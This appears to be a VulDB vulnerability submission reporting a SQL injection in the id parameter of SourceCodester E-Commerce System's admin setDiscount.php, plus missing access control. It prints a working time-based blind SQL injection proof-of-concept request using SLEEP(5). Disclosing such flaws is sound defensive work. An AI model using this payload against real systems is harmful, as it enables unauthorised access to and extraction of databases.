Enviar #103516: E-Commerce System setDiscount.php SQL Injection Vulnerabilityinformación

TítuloE-Commerce System setDiscount.php SQL Injection Vulnerability
DescripciónE-Commerce System has a SQL Injection Vulnerability , the vulnerable URI is '/ecommerce/admin/settings/setDiscount.php?id=201737' , and the injectable parameters is id A time-based blind poc is below: GET /ecommerce/admin/settings/setDiscount.php?id=201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) HTTP/1.1 And server will also response even if there's no cookie in the header, which is an improper access control.
Fuente⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html
Usuario
 WWesleywww (UID 43117)
Sumisión2023-03-20 08:07 (hace 3 años)
Moderación2023-03-20 08:33 (26 minutes later)
EstadoAceptado
Entrada de VulDB223409 [SourceCodester E-Commerce System 1.0 setDiscount.php ID inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Do you need the next level of professionalism?

Upgrade your account now!